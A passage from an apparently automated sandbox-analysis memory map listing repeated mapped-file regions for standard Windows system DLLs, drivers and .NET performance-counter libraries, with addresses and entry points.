"\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3932 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3933 start_va = 0xbb0000 end_va = 0xbb5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3934 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3935 start_va = 0xbb0000 end_va = 0xbb5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3936 start_va = 0xde0000 end_va = 0xe33fff monitored = 0 entry_point = 0xdf3450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3937 start_va = 0xb90000 end_va = 0xb91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3938 start_va = 0xde0000 end_va = 0xe33fff monitored = 0 entry_point = 0xdf3450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3939 start_va = 0xb90000 end_va = 0xb91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3940 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3941 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3942 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3943 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3944 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3945 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3947 start_va = 0xb90000 end_va = 0xbb0fff monitored = 0 entry_point = 0xbaa06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3948 start_va = 0xbc0000 end_va = 0xbc3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3949 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3950 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3951 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3952 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3953 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3954 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3955 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3956 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3958 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3959 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3960 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3961 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3962 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3963 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3964 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3965 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3966 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xbd68c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3967 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3968 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xbd68c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3969 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3970 start_va = 0xde0000 end_va = 0xebbfff monitored = 0 entry_point = 0xe55ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3971 start_va = 0xb90000 end_va = 0xb90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3972 start_va = 0xde0000 end_va = 0xebbfff monitored = 0 entry_point = 0xe55ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3973 start_va = 0xb90000 end_va = 0xb90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3974 start_va = 0xde0000 end_va = 0xec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3975 start_va = 0xb90000 end_va = 0xbb8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3976 start_va = 0xde0000 end_va = 0xec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3977 start_va = 0xb90000 end_va = 0xbb8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3978 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3979 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3980 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3981 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3982 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3983 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3984 start_va = 0xde0000 end_va = 0xe88fff monitored = 0 entry_point = 0xdf18d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3985 start_va = 0xb90000 end_va = 0xb94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3987 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3988 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3989 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3990 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3991 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3992 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3993 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3994 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3995 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3996 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3997 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3998 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3999 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4000 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4001 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4002 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4003 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4004 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4005 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4006 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4007 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4008 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4009 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4010 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4011 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4012 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4013 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4014 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4015 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4016 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4017 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4018 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4019 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4020 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4021 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4022 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4024 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4025 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4026 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4027 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4028 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4029 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4030 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4031 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4032 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4033 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4034 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4035 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4036 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4037 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4038 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4039 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4040 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4041 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: 